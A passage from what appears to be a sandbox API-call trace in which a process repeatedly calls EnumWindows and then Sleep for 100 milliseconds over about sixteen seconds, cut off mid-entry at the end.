[0275.696] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.697] Sleep (dwMilliseconds=0x64) [0275.808] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.812] Sleep (dwMilliseconds=0x64) [0275.830] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.830] Sleep (dwMilliseconds=0x64) [0275.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.876] Sleep (dwMilliseconds=0x64) [0275.908] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.909] Sleep (dwMilliseconds=0x64) [0275.970] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.972] Sleep (dwMilliseconds=0x64) [0276.079] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.080] Sleep (dwMilliseconds=0x64) [0276.197] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.199] Sleep (dwMilliseconds=0x64) [0276.268] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.269] Sleep (dwMilliseconds=0x64) [0276.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.342] Sleep (dwMilliseconds=0x64) [0276.406] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.407] Sleep (dwMilliseconds=0x64) [0276.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.454] Sleep (dwMilliseconds=0x64) [0276.499] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.499] Sleep (dwMilliseconds=0x64) [0276.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.594] Sleep (dwMilliseconds=0x64) [0276.701] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.702] Sleep (dwMilliseconds=0x64) [0276.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.767] Sleep (dwMilliseconds=0x64) [0276.860] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.861] Sleep (dwMilliseconds=0x64) [0276.923] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.924] Sleep (dwMilliseconds=0x64) [0276.939] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.940] Sleep (dwMilliseconds=0x64) [0276.984] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0276.986] Sleep (dwMilliseconds=0x64) [0277.020] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.020] Sleep (dwMilliseconds=0x64) [0277.093] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.094] Sleep (dwMilliseconds=0x64) [0277.172] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.173] Sleep (dwMilliseconds=0x64) [0277.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.266] Sleep (dwMilliseconds=0x64) [0277.392] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.393] Sleep (dwMilliseconds=0x64) [0277.428] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.430] Sleep (dwMilliseconds=0x64) [0277.482] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.483] Sleep (dwMilliseconds=0x64) [0277.532] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.533] Sleep (dwMilliseconds=0x64) [0277.572] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.573] Sleep (dwMilliseconds=0x64) [0277.673] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.673] Sleep (dwMilliseconds=0x64) [0277.752] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.753] Sleep (dwMilliseconds=0x64) [0277.799] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.800] Sleep (dwMilliseconds=0x64) [0277.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.860] Sleep (dwMilliseconds=0x64) [0277.955] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0277.956] Sleep (dwMilliseconds=0x64) [0278.020] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.022] Sleep (dwMilliseconds=0x64) [0278.029] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.030] Sleep (dwMilliseconds=0x64) [0278.067] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.069] Sleep (dwMilliseconds=0x64) [0278.157] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.158] Sleep (dwMilliseconds=0x64) [0278.245] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.250] Sleep (dwMilliseconds=0x64) [0278.345] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.346] Sleep (dwMilliseconds=0x64) [0278.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.439] Sleep (dwMilliseconds=0x64) [0278.598] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.598] Sleep (dwMilliseconds=0x64) [0278.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.688] Sleep (dwMilliseconds=0x64) [0278.772] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.772] Sleep (dwMilliseconds=0x64) [0278.809] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.811] Sleep (dwMilliseconds=0x64) [0278.829] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.830] Sleep (dwMilliseconds=0x64) [0278.876] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.877] Sleep (dwMilliseconds=0x64) [0278.953] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0278.953] Sleep (dwMilliseconds=0x64) [0278.999] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0279.000] Sleep (dwMilliseconds=0x64) [0279.126] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0279.127] Sleep (dwMilliseconds=0x64) [0279.295] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0279.297] Sleep (dwMilliseconds=0x64) [0279.392] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0279.393] Sleep (dwMilliseconds=0x64) [0279.482] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0279.483] Sleep (dwMilliseconds=0x64) [0279.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0279.610] Sleep (dwMilliseconds=0x64) [0279.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0279.732] Sleep (dwMilliseconds=0x64) [0279.905] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0279.905] Sleep (dwMilliseconds=0x64) [0280.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.002] Sleep (dwMilliseconds=0x64) [0280.045] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.046] Sleep (dwMilliseconds=0x64) [0280.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.063] Sleep (dwMilliseconds=0x64) [0280.124] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.125] Sleep (dwMilliseconds=0x64) [0280.157] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.158] Sleep (dwMilliseconds=0x64) [0280.201] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.202] Sleep (dwMilliseconds=0x64) [0280.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.264] Sleep (dwMilliseconds=0x64) [0280.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.359] Sleep (dwMilliseconds=0x64) [0280.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.435] Sleep (dwMilliseconds=0x64) [0280.467] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.468] Sleep (dwMilliseconds=0x64) [0280.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.482] Sleep (dwMilliseconds=0x64) [0280.611] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.612] Sleep (dwMilliseconds=0x64) [0280.732] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.734] Sleep (dwMilliseconds=0x64) [0280.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0280.905] Sleep (dwMilliseconds=0x64) [0281.007] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.008] Sleep (dwMilliseconds=0x64) [0281.126] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.127] Sleep (dwMilliseconds=0x64) [0281.172] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.173] Sleep (dwMilliseconds=0x64) [0281.184] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.188] Sleep (dwMilliseconds=0x64) [0281.236] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.236] Sleep (dwMilliseconds=0x64) [0281.276] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.277] Sleep (dwMilliseconds=0x64) [0281.376] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.376] Sleep (dwMilliseconds=0x64) [0281.455] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.456] Sleep (dwMilliseconds=0x64) [0281.505] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.506] Sleep (dwMilliseconds=0x64) [0281.613] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.615] Sleep (dwMilliseconds=0x64) [0281.722] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.723] Sleep (dwMilliseconds=0x64) [0281.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.781] Sleep (dwMilliseconds=0x64) [0281.818] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.819] Sleep (dwMilliseconds=0x64) [0281.875] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0281.877] Sleep (dwMilliseconds=0x64) [0282.155] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.156] Sleep (dwMilliseconds=0x64) [0282.205] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.207] Sleep (dwMilliseconds=0x64) [0282.319] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.320] Sleep (dwMilliseconds=0x64) [0282.422] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.424] Sleep (dwMilliseconds=0x64) [0282.518] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.518] Sleep (dwMilliseconds=0x64) [0282.584] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.585] Sleep (dwMilliseconds=0x64) [0282.643] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.643] Sleep (dwMilliseconds=0x64) [0282.710] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.712] Sleep (dwMilliseconds=0x64) [0282.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.768] Sleep (dwMilliseconds=0x64) [0282.821] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.821] Sleep (dwMilliseconds=0x64) [0282.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0282.908] Sleep (dwMilliseconds=0x64) [0283.002] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.003] Sleep (dwMilliseconds=0x64) [0283.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.095] Sleep (dwMilliseconds=0x64) [0283.188] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.189] Sleep (dwMilliseconds=0x64) [0283.391] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.393] Sleep (dwMilliseconds=0x64) [0283.454] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.455] Sleep (dwMilliseconds=0x64) [0283.496] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.501] Sleep (dwMilliseconds=0x64) [0283.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.594] Sleep (dwMilliseconds=0x64) [0283.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.689] Sleep (dwMilliseconds=0x64) [0283.782] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.783] Sleep (dwMilliseconds=0x64) [0283.831] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.832] Sleep (dwMilliseconds=0x64) [0283.876] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.877] Sleep (dwMilliseconds=0x64) [0283.933] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.937] Sleep (dwMilliseconds=0x64) [0283.972] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.973] Sleep (dwMilliseconds=0x64) [0283.983] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0283.984] Sleep (dwMilliseconds=0x64) [0284.001] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.002] Sleep (dwMilliseconds=0x64) [0284.045] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.047] Sleep (dwMilliseconds=0x64) [0284.113] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.114] Sleep (dwMilliseconds=0x64) [0284.188] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.190] Sleep (dwMilliseconds=0x64) [0284.298] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.299] Sleep (dwMilliseconds=0x64) [0284.404] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.406] Sleep (dwMilliseconds=0x64) [0284.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.513] Sleep (dwMilliseconds=0x64) [0284.538] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.539] Sleep (dwMilliseconds=0x64) [0284.545] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.546] Sleep (dwMilliseconds=0x64) [0284.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.560] Sleep (dwMilliseconds=0x64) [0284.610] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.611] Sleep (dwMilliseconds=0x64) [0284.624] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.625] Sleep (dwMilliseconds=0x64) [0284.672] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.673] Sleep (dwMilliseconds=0x64) [0284.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.767] Sleep (dwMilliseconds=0x64) [0284.845] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.846] Sleep (dwMilliseconds=0x64) [0284.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0284.907] Sleep (dwMilliseconds=0x64) [0285.004] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.005] Sleep (dwMilliseconds=0x64) [0285.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.033] Sleep (dwMilliseconds=0x64) [0285.044] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.045] Sleep (dwMilliseconds=0x64) [0285.060] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.062] Sleep (dwMilliseconds=0x64) [0285.108] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.109] Sleep (dwMilliseconds=0x64) [0285.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.123] Sleep (dwMilliseconds=0x64) [0285.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.189] Sleep (dwMilliseconds=0x64) [0285.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.264] Sleep (dwMilliseconds=0x64) [0285.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.377] Sleep (dwMilliseconds=0x64) [0285.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.436] Sleep (dwMilliseconds=0x64) [0285.515] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.516] Sleep (dwMilliseconds=0x64) [0285.618] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.622] Sleep (dwMilliseconds=0x64) [0285.707] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.708] Sleep (dwMilliseconds=0x64) [0285.716] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.718] Sleep (dwMilliseconds=0x64) [0285.752] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.753] Sleep (dwMilliseconds=0x64) [0285.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.891] Sleep (dwMilliseconds=0x64) [0285.944] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0285.944] Sleep (dwMilliseconds=0x64) [0285.996] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.001] Sleep (dwMilliseconds=0x64) [0286.092] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.093] Sleep (dwMilliseconds=0x64) [0286.178] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.179] Sleep (dwMilliseconds=0x64) [0286.235] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.236] Sleep (dwMilliseconds=0x64) [0286.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.299] Sleep (dwMilliseconds=0x64) [0286.412] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.413] Sleep (dwMilliseconds=0x64) [0286.536] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.538] Sleep (dwMilliseconds=0x64) [0286.599] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.600] Sleep (dwMilliseconds=0x64) [0286.680] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.682] Sleep (dwMilliseconds=0x64) [0286.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.783] Sleep (dwMilliseconds=0x64) [0286.833] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.835] Sleep (dwMilliseconds=0x64) [0286.871] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.876] Sleep (dwMilliseconds=0x64) [0286.933] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0286.934] Sleep (dwMilliseconds=0x64) [0287.034] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.034] Sleep (dwMilliseconds=0x64) [0287.083] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.085] Sleep (dwMilliseconds=0x64) [0287.131] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.132] Sleep (dwMilliseconds=0x64) [0287.225] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.226] Sleep (dwMilliseconds=0x64) [0287.270] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.271] Sleep (dwMilliseconds=0x64) [0287.306] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.308] Sleep (dwMilliseconds=0x64) [0287.415] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.415] Sleep (dwMilliseconds=0x64) [0287.455] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.457] Sleep (dwMilliseconds=0x64) [0287.479] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.480] Sleep (dwMilliseconds=0x64) [0287.530] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.532] Sleep (dwMilliseconds=0x64) [0287.555] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.556] Sleep (dwMilliseconds=0x64) [0287.560] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.560] Sleep (dwMilliseconds=0x64) [0287.616] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.617] Sleep (dwMilliseconds=0x64) [0287.669] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.671] Sleep (dwMilliseconds=0x64) [0287.699] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.701] Sleep (dwMilliseconds=0x64) [0287.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.751] Sleep (dwMilliseconds=0x64) [0287.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.826] Sleep (dwMilliseconds=0x64) [0287.886] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.890] Sleep (dwMilliseconds=0x64) [0287.980] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0287.981] Sleep (dwMilliseconds=0x64) [0288.108] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.109] Sleep (dwMilliseconds=0x64) [0288.123] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.124] Sleep (dwMilliseconds=0x64) [0288.173] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.175] Sleep (dwMilliseconds=0x64) [0288.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.231] Sleep (dwMilliseconds=0x64) [0288.271] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.273] Sleep (dwMilliseconds=0x64) [0288.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.356] Sleep (dwMilliseconds=0x64) [0288.446] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.450] Sleep (dwMilliseconds=0x64) [0288.529] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.530] Sleep (dwMilliseconds=0x64) [0288.564] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.565] Sleep (dwMilliseconds=0x64) [0288.602] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.603] Sleep (dwMilliseconds=0x64) [0288.623] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.624] Sleep (dwMilliseconds=0x64) [0288.702] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.703] Sleep (dwMilliseconds=0x64) [0288.769] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.771] Sleep (dwMilliseconds=0x64) [0288.817] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.818] Sleep (dwMilliseconds=0x64) [0288.877] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.878] Sleep (dwMilliseconds=0x64) [0288.943] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.944] Sleep (dwMilliseconds=0x64) [0288.986] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0288.987] Sleep (dwMilliseconds=0x64) [0289.049] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.050] Sleep (dwMilliseconds=0x64) [0289.093] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.095] Sleep (dwMilliseconds=0x64) [0289.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.169] Sleep (dwMilliseconds=0x64) [0289.212] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.314] Sleep (dwMilliseconds=0x64) [0289.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.390] Sleep (dwMilliseconds=0x64) [0289.476] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.481] Sleep (dwMilliseconds=0x64) [0289.580] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.581] Sleep (dwMilliseconds=0x64) [0289.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.641] Sleep (dwMilliseconds=0x64) [0289.720] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.721] Sleep (dwMilliseconds=0x64) [0289.809] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.814] Sleep (dwMilliseconds=0x64) [0289.865] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.865] Sleep (dwMilliseconds=0x64) [0289.889] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.890] Sleep (dwMilliseconds=0x64) [0289.939] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.940] Sleep (dwMilliseconds=0x64) [0289.953] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0289.954] Sleep (dwMilliseconds=0x64) [0290.027] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.027] Sleep (dwMilliseconds=0x64) [0290.126] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.127] Sleep (dwMilliseconds=0x64) [0290.199] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.204] Sleep (dwMilliseconds=0x64) [0290.264] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.264] Sleep (dwMilliseconds=0x64) [0290.351] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.352] Sleep (dwMilliseconds=0x64) [0290.366] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.367] Sleep (dwMilliseconds=0x64) [0290.371] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.372] Sleep (dwMilliseconds=0x64) [0290.453] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.454] Sleep (dwMilliseconds=0x64) [0290.486] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.487] Sleep (dwMilliseconds=0x64) [0290.529] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.530] Sleep (dwMilliseconds=0x64) [0290.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.623] Sleep (dwMilliseconds=0x64) [0290.685] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.686] Sleep (dwMilliseconds=0x64) [0290.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.748] Sleep (dwMilliseconds=0x64) [0290.813] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.814] Sleep (dwMilliseconds=0x64) [0290.827] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.828] Sleep (dwMilliseconds=0x64) [0290.844] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.844] Sleep (dwMilliseconds=0x64) [0290.871] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.873] Sleep (dwMilliseconds=0x64) [0290.920] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.921] Sleep (dwMilliseconds=0x64) [0290.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0290.969] Sleep (dwMilliseconds=0x64) [0291.016] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.017] Sleep (dwMilliseconds=0x64) [0291.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.107] Sleep (dwMilliseconds=0x64) [0291.186] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.187] Sleep (dwMilliseconds=0x64) [0291.209] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.211] Sleep (dwMilliseconds=0x64) [0291.251] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.251] Sleep (dwMilliseconds=0x64) [0291.274] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.275] Sleep (dwMilliseconds=0x64) [0291.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.279] Sleep (dwMilliseconds=0x64) [0291.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.295] Sleep (dwMilliseconds=0x64) [0291.361] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.362] Sleep (dwMilliseconds=0x64) [0291.409] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.410] Sleep (dwMilliseconds=0x64) [0291.454] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.454] Sleep (dwMilliseconds=0x64) [0291.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.545] Sleep (dwMilliseconds=0x64) [0291.624] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.624] Sleep (dwMilliseconds=0x64) [0291.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.640] Sleep (dwMilliseconds=0x64) [0291.694] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.696] Sleep (dwMilliseconds=0x64) [0291.711] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.713] Sleep (dwMilliseconds=0x64) [0291.716] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.717] Sleep (dwMilliseconds=0x64) [0291.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0291.748] Sleep 